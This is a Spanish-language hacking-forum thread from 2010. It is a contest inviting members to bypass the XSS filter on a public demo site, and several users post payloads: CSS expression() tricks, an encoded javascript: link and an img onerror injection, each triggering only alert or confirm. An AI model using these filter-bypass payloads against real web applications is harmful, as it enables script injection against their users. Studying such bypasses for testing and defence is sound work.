[CYH] Bypass de filtros de XSS :)

Iniciado por sirdarckcat, 8 Abril 2010, 08:47 AM

0 Miembros y 1 Visitante están viendo este tema.

sirdarckcat

Can You Hack?
Semi-allowhtml

CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos :D



Hola!

Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/

Yo lo bypasee hace rato xD
<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div>

Asi que no esta muy dificil!

Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net

Saludos!!

tragantras

alguien que sea generoso puede explicar la cadena que ha puesto sidarckcat

en concreto... el campo style de la etiqueta div

gracias y un saludo :3
Colaboraciones:
1 2

jdc

Es parte de la celebración de abril negro?

No había puesto WHK el filtro de otra página?

sirdarckcat

el de WHK es PHPIDS
ese es otro


y no tiene nada que ver con abril negro xD

jdc

#4
ya no encontre nada y me dolio la cabeza, es muy extraño tu xss ¬¬ no lo entiendo o ya esta solucionado?

<img widht="2000" height="2000" src="http://foro.elhacker.net/Smileys/chef/carita.gif" alt="juas" />


jajajajaja

Shell Root

#5
Raro, porque?, Creo que es CSS Injection :P, Además si mal no recuerdo, expression es solo para IE!  :silbar:

Código (css) [Seleccionar]
<XSS STYLE="xss:expression(alert('XSS'))">...
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

yasión

Esto hace cosas raras:

Código (javascript) [Seleccionar]
<a href="></a>

Es lo primero que he probado, luego lo miro un poco más.

SeC

Ya he probado de mil maneras =/ , esto se ve lindo, pero nada jeje, ta bueno el filtro =P

Código (html4strict) [Seleccionar]
<a href="javascr&#x0Aipt:a&#x0Alert(1);" target="_blank">asd</a>

Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.

cgvwzq

Quiero una cuenta... =P

<script>><img src=x onerror=alert(/cuack/) tr=
Some stuff:

  • www.a] parsed as www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ



Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.